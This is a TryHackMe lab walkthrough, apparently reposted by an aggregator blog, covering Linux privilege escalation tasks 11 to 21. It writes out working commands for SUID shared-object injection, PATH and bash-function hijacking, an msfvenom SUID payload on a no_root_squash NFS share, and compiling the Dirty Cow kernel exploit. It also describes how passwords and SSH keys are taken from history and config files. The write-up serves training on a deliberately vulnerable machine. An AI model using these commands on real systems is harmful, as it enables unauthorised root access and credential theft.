TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2) : Benjamin Reitz
by: Benjamin Reitz
blow post content copied from Finxter
click here to view original post
CHALLENGE OVERVIEW
- CTF Creator: Tib3rius
- Link: https://tryhackme.com/room/linuxprivesc
- Difficulty: medium
- Target: gaining root access using a variety of different techniques
- Highlight: Rooting a Linux machine using the famous Dirty Cow Kernel Exploit.
- Tags: privesc, linux, privilege escalation
BACKGROUND
Welcome back to part II of this Linux privilege escalation series. You can find part 1 of this mini-series here:
Recommended: TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (1/2)
In this tutorial, we’ll try some additional “magical” methods of gaining root access in tasks 11-21. Buckle in, and let’s get to it!
TASK 11 SUID/SGID executables
After making sure that we have connected to the TryHackMe VPN with OpenVPN, let’s go ahead and search for all files that have a SUID or SGID bit:
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Let’s check out the exim 4.84-3 on exploit-db.com to see if there are any known vulnerabilities. There is!
To make this faster, TryHackMe has already preloaded our machine with the exploit file. Let’s execute it and see if we can grab root!
TASK 12 SUID / SGID Executables – Shared Object Injection
In this privesc method we will use strace to search for libraries with no such file error when running the suid-so binary.
The libcalc.so file should exist in the /home/user/.config/ directory, but it is apparently missing. Let’s compile the included c file into that location with the command:
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c
Now when we run the suid-so binary it should spawn a root shell.
TASK 13 SUID / SGID Executables – Environment Variables
We’ll run strings to see a little more about the inner workings of the suid-env file.
strings /usr/local/bin/suid-env
We can see that the final step in this program is to start an apache2 service. We can hijack this service by compiling a spoofed program with the same name that spawns a bash shell.
gcc -o service /home/user/tools/suid/service.c
Finally, we need to modify the PATH variable with our current directory prepended in order to allow our spoofed service file to run.
PATH=.:$PATH /usr/local/bin/suid-env
TASK 14 SUID / SGID Executables – Abusing Shell Features (#1)
In this task, we will exploit the suid-env2 executable’s full path. In bash versions < 4.2-048 it is possible to create shell functions with filenames that appear to be full paths and also to export them to be used instead of the actual executables.
First, let’s check our bash version:
/bin/bash --version
And now, let’s create a Bash function with the name “/usr/sbin/service” that will spawn a new Bash shell with persistence mode turned on.
function /usr/sbin/service { /bin/bash -p; }
And last but not least, let’s export this new function and run the executable to get our root shell!
export -f /usr/sbin/service /usr/local/bin/suid-env2
TASK 15 SUID / SGID Executables – Abusing Shell Features (#2)
We’ll exploit another shell function that works on Bash versions 4.4 and above. This time we’ll exploit the debugging mode’s ability to spawn an extra prompt for debugging statements.
In the env command, we ask the debugging shell to run a command to copy /bin/bash to a new file /tmp/rootbash and to give that file +xs permissions to let us execute and become root on the new shell.
TASK 16 Passwords & Keys – History Files
This is my favorite method in this whole list because of the simplicity of the hack.
We scan all hidden bash history files and view them with less to search for passwords that may have been saved as plaintext. We find a MySQL password for root and can easily switch users to root.
TASK 17 Passwords & Keys – Config Files
In this task, we examine an ovpn file to see if there are any references to a file holding credentials. We find them without much trouble!
TASK 18 Passwords & Keys – SSH Keys
In this task, I’ll identify and copy a hidden ssh key from the target machine.
Next, over on my Kali attackbox, we paste the contents into a new file and change permissions to 600 before SSHing our way into the target machine as root!
TASK 19 NFS
In this task, we’ll exploit the network file system by mounting it to our attackbox and changing permissions. First, let’s cat out /etc/exports to see what is mountable and which permissions we might be able to exploit.
And here we see the infamous exploitable “no_root_squash”!
Recommended: For further reading on exploiting the no_root_squash permissions on NFS, check out Hacking Network File System (NFS) – A TryHackMe Walkthrough
First, let’s create a new mount point at /tmp/mount on our attack machine.
mkdir /tmp/mount
Now let’s mount the NFS folder.
mount -o rw,vers=3 10.10.10.10:/tmp /tmp/nfs
Let’s create a malicious payload with msfvenom and place it in the NFS directory.
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
Now let’s add SUID permissions so that we can spawn a root shell.
chmod +xs /tmp/nfs/shell.elf
The last step is to switch back to the target machine and run the elf file to gain a root shell.
/tmp/shell.elf
TASK 20 Kernel Exploits
In the final task, we will find a known kernel exploit and run it to gain root access. Let’s start out by running the Linux exploit suggester 2 script to help us identify potential exploits.
We’ll move ahead with option 3, the dirty_cow exploit. Let’s compile it from the files already conveniently located on my machine.
gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
And now we can run it and gain a root shell.
./c0w
TASK 21 Privilege Escalation Scripts
The three scripts for Linux privesc located on this machine are:
LinEnum.shlinpeas.shlse.sh
A full comparison of these scripts is out of the scope of this tutorial. If you’d like to see a detailed side-by-side analysis, please let me know, and I’ll add it to my list of future blog ideas.
FINAL THOUGHTS
Thanks for reading this write-up!
I’ve enjoyed trying out all of the different ways to privesc to root on Linux machines. It leaves me questioning my assumption that Linux machines are more secure than Windows or Mac machines.
It also reaffirms the importance of keeping operating systems up to date.
February 27, 2023 at 09:13PM
Click here for more details...
=============================
The original post is available in Finxter by Benjamin Reitz
this post has been published as it is through automation. Automation script brings all the top bloggers post under a single umbrella.
The purpose of this blog, Follow the top Salesforce bloggers and collect all blogs in a single place through automation.
============================
Post a Comment